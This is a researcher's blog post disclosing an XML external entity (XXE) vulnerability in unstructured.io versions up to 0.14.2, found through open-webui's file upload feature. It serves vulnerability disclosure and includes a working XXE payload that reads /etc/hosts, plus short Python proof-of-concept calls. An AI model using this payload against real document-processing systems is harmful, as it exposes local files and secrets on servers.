CVE-2024-46455 : XML eXternal Entity vulnerability in unstructured.io <= 0.14.2


Before proceeding I would like to give a shoutout to my awesome friend and colleague
Mohit K
who tagged along in this journey and played a pivotal role.
Summary
This blog is a result of the applied vulnerability research that we did against open-webui [ For those who don’t know, WebUI provides the UI for Ollama AI models ]
open-webui has a feature to upload files and then ask models to answer from the uploaded content. This is where our internal security team found this vulnerability, on first look we thought this is related to the open-webui project. This specific vulnerability caught my interest and on digging further we realized that we are looking at a new CVE !!!
Exploitation Steps
We have uploaded a malicious xml payload to the open-webui chat window and upon asking questions from the uploaded document, we saw that it displayed the contents of a local file. I was thinking this could be due to the LLM model hallucinating and producing garbage response.
To confirm this, I looked into the source code of open-webui for the code responsible for processing the uploaded document
process_doc function internally called the get_loader function to find the appropriate loader to process the document based on the content-type of the document.
[ removed the lines in between these snippets to save your eyes ]
A bump on our journey
UnstructuredXMLLoader comes from the langchain library which contains few other loaders
Now you may wonder, what these loaders are ? They are nothing but classes that has functions to parse the documents and load the contents of the document, so that our LLMs can interpret the context and answer our questions from them.
They named it this way so it is similar to Java’s Interfaces and their implementations
When we thought our journey has hit a wall and we are not sure what to do, we checked if there are any known vulnerabilities against this library. To our surprise there was one, but it was not against the function we are looking at
Then we further looked into this vulnerability and after few hours we go to know that this vulnerability is not there in latest version of langchain and this gave an idea to test this vulnerability by decreasing the versions of langchain library.
Finding the vulnerable version
Following image reveals that langchain==0.2.14 was found to be secure against this vulnerability,
but langchain==0.2.0 which uses unstructured==0.14.2 was found to be vulnerable !
# vulnerable on unstructured <= 0.14.2
from langchain_community.document_loaders import UnstructuredXMLLoader
loader = UnstructuredXMLLoader("/path/to/xxe/payload.xml")
data = loader.load()
print(data)
<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/hosts"> ]>
<userInfo>
<username>&ent;</username>
</userInfo>
If you are into applied vulnerability research, you know what this means ! Now we know the vulnerable version, we have to look at the Changelog to see what changes are introduced
I’m sure that caught your eyes too !! The team has fixed a vulnerability without publishing a security advisory and due this there is no record of this vulnerability in the face of internet.
And there is possibility of lot of developers still using the older version and no SCA scanners would be able to alert them. WOW !
The pull request that fixed this issue :: https://github.com/Unstructured-IO/unstructured/pull/3088/commits
Proof of Concept
# vulnerable on unstructured <= 0.14.2
from unstructured.partition.xml import partition_xml
data = partition_xml(filename="./payload.xml")
print([ x.text for x in data])
Conclusion
And with this, we have concluded that we re-discovered a vulnerability which was fixed without notifying the users of the package. In general, this is not considered as a good security practice. We have to let the users know about the vulnerability even it is fixed on the very next release, this will help them to plan the updates and avoid unnecessary breaches due to usage of outdated versions of this library.
I am attaching the canvas I used during this vulnerability research, hope you find this interesting !
Subscribe to my newsletter
Read articles from Mohanraj R directly inside your inbox. Subscribe to the newsletter, and don't miss out.
Written by

Mohanraj R
Mohanraj R
I'm the exact person your mom threatened you would become like; if you didn't get off the computer and go out to socialize 🥷🏽